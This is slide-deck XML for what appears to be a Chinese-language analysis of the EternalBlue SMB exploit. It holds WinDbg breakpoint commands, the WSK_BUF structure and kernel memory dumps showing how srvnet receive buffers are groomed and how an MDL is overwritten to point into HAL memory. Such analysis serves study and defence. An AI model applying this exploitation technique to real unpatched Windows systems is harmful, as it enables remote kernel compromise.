            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>afd!WskProAPIReceive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>时分配的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MDL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的地址都间隔了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x11000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>字节。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>bp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>afd!WskProAPIReceive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>  ".echo ##############;dd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> l8; .echo *************;dd poi(esp+8) l20;.echo *************;dt poi(poi(esp+8)) _MDL;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>gc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>;"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294983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678159" y="986300"/>
            <a:ext cx="9688029" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查看用户信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D718DBB2-BECF-4CE3-B83F-20911E9A622E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1300885" y="1487548"/>
            <a:ext cx="7795139" cy="1425385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7970DF44-E134-4C7F-9B62-33C197DA9024}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2881361"/>
            <a:ext cx="6985249" cy="3703545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{229013C5-1337-4596-8B6B-4AA3D4F36624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3959982" y="3287034"/>
            <a:ext cx="8039342" cy="2039423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EA03A03-E7B7-48E2-B8CE-584CC540D670}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4052714" y="5871700"/>
            <a:ext cx="7995947" cy="685217"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1804441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822742064"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7276793" y="2885282"/>
          <a:ext cx="3164162" cy="1648184"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3164162">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4143037793"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1648184">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>typedef struct _WSK_BUF {</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>  PMDL  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" u="sng" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Mdl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>  ULONG  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" u="sng" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Offset</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>  SIZE_T  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" u="sng" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Length</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>} WSK_BUF, *PWSK_BUF;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="7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9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{562DE953-93E4-4118-AFF3-A0FDC0908AE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438539" y="2947267"/>
            <a:ext cx="5895862" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>srvnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在接收这些包时，分配置了接收环境块及接收的内存等相关内容。其中偏移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x18</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>开的地方存了就存了调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>afd!WskProAPIReceive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>WSK_BUF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1109829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1169857945"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6096000" y="258783"/>
          <a:ext cx="6096000" cy="63785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43037793"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1648184">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>3: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>kd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&gt; dd 86811000 l100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86811000  00011000 00000000 0044006d 00740061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86811010  005c0008 0069004d 00720063 86811160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86811020  00010ea0 00000000 8681103c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86811030  0000fff7 8825f568 868110a4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86811040  10040060 00000000 86811160 86811000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86811050  00010ea0 00000160 0007f811 0007f812</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86811060  0007f813 0007f814 0007f815 0007f816</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86811070  0007f817 0007f818 0007f819 0007f81a</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86811080  0007f81b 0007f81c 0007f81d 0007f81e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86811090  0007f81f 0007f820 0007f821 00650078</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868110a0  005c0072 00000000 00000064 0065006c</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868110b0  005c0073 00000000 00010ea0 00000fff</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868110c0  00340030 0063002e 00000069 00690064</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868110d0  c0100002 04240116 0880e96f 00000001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868110e0  977dd5f0 0044005c 00760065 00630069</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868110f0  005c0065 00610048 00640072 00690064</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86811100  006b0073 006f0056 0075006c 0065006d</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86811110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86811120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86811130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86811140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86811150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7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C43917CD-B866-420A-A3DD-88EBE784783C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="71670" y="2698207"/>
            <a:ext cx="6096000" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>WSK_BUF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Mdl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>指向的正是环境块偏移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x2c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的地址。如下面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>86811010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是接收环境块的开始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>86811028</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>afd!WskProAPIReceive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>WSK_BUF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>8681103c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>就是接收数据所用内存的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MDL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>描述。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368995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887721915"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6096000" y="258783"/>
          <a:ext cx="6096000" cy="63785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43037793"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1648184">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>3: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>kd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&gt; dd 86811000 l100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86811000  00000000 00000000 0000ffff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86811010  0000ffff 00000000 00000000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86811020  00000000 00000000 ffdff100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86811030  00000000 ffdff020 ffdff100 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ffffffff</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86811040  10040060 00000000 ffdfef80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86811050  ffd00010 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ffffffff</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> ffd00118 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ffffffff</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86811060  00000000 00000000 00000000 00000000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86811070  10040060 00000000 00000000 00000000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86811080  ffcfff90 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ffffffff</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 00000000 00000000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86811090  00001080 00000000 00000000 00000000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868110a0  005c0054 00000000 00000064 0065006c</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868110b0  005c0073 00000000 00010ea0 00000fff</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868110c0  00340030 0063002e 00000069 00690064</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868110d0  c0100002 04240116 0880e96f 00000001</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868110e0  977dd5f0 0044005c 00760065 00630069</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868110f0  005c0065 00610048 00640072 00690064</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86811100  006b0073 006f0056 0075006c 0065006d</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86811110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86811120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86811130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86811140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86811150  4e4e4e4e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4e4e4e4e</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="18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6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED27E5A-DFE9-471F-AE1C-E48F0B6236D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2492282"/>
            <a:ext cx="5895862" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>因为前面的步骤发送了一系列的包，让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>srvnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>驱动分配了一系统的内存块。规律就如同前面说描述的那样。这是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Eternalblue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>再发送一个超大的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>srvnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>驱动接收后会走到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
